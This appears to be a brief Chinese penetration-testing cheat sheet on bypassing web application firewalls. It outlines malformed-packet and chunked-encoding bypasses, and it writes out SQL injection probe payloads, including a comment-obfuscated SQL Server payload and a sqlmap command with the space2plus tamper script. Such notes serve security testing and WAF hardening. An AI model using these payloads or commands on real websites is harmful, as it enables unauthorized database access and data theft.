绕Waf姿势

一:畸形包绕过

二:正向数据绕过

三:分块绕过

 

SQLI中绕过方式

检测:
a.
AND+1=1
AND+1=2

b.
'/*%!*/or/*%!*/'1'like '1' --+(sqlserver) 项目实战参考:https://mp.weixin.qq.com/s/R-dWHLI4p_NyZNuYajNmuQ

注入绕过:

a.(适用对象WTS-WAF - Access数据库)

sqlmap.py -u url --tables --tamper space2plus.py

 

参考文章

https://github.com/EnableSecurity/wafw00f
https://github.com/Ekultek/WhatWaf
https://security.tencent.com/index.php/blog/msg/151

 

相关文章:

  • 2022-12-23
  • 2021-11-14
  • 2021-05-08
  • 2021-12-07
  • 2022-01-13
猜你喜欢
  • 2022-12-23
  • 2021-06-20
  • 2021-11-19
  • 2021-08-14
  • 2022-12-23
  • 2021-07-27
相关资源
相似解决方案